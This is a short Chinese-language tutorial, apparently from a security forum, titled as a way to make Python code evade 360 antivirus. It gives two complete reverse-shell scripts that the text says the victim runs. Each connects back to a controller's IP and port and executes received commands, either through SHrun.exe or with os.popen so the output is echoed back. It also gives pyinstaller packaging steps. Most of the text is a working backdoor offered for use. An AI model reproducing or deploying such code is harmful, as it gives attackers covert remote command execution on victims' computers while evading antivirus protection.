Python两次套娃,实现免杀360

难易指数:1星 作者:liusuxy

因为方法简单，故可能有人做过

1.免杀思路:

这里说说大概：

• 方案一:用socket编写通信脚本，将获取的命令用SHrun.exe运行，适合作跳板机

• 方案二:用socket编写通信脚本，将获取的命令直接执行并回显，适合直接反弹shell

2.关于脚本:

方案一：（文件少，但功能没有回显）

受害者执行的Python源码

import os
import time
import socket
'''################'''
server_ip = ''       # 更改为控制端的IP
server_port = 13524  # 更改为控制端的第一PORT
'''################'''
s = socket.socket()
while True:
    try:
        s.connect((server_ip, server_port))
        break
    except:
        time.sleep(3)
while True:
    s.send(b'[ltPPDS1:->')
    cmd = s.recv(1024).decode()
    if cmd == 'exit:':
        break
    os.system("SHrun.exe {0}".format(cmd))
s.close()

SHrun.exe下载

注意事项:

• 1.将SHrun.exe与py打包好的exe放在同一目录

• 2.若用pyinstaller打包，请使用 -F 选项

方案二: (文件多，但功能可以无限扩充):

这里给出参考模板

import os
import time
import socket
'''################'''
server_ip = ''       # 更改为控制端的IP
server_port = 13524  # 更改为控制端的第一PORT
'''################'''
s = socket.socket()
while True:
    try:
        s.connect((server_ip, server_port))
        break
    except:
        time.sleep(3)
while True:
    s.send(b'[ltPPDS1:->')
    cmd = s.recv(1024).decode()
    if cmd == 'exit:':
        break
    s.send(os.popen("{0}".format(cmd)).read().encode())
s.close()

注意事项:

• 1.若用pyinstaller打包，请不使用 -F 选项

3.使用方法:

1.将py源码通过工具(pyinstaller 等)转换为exe

2.将SHrun.exe与py打包好的exe放在同一目录(可能要，有可能不需要)

3.运行pyinstaller打包好的exe

4.输入exit退出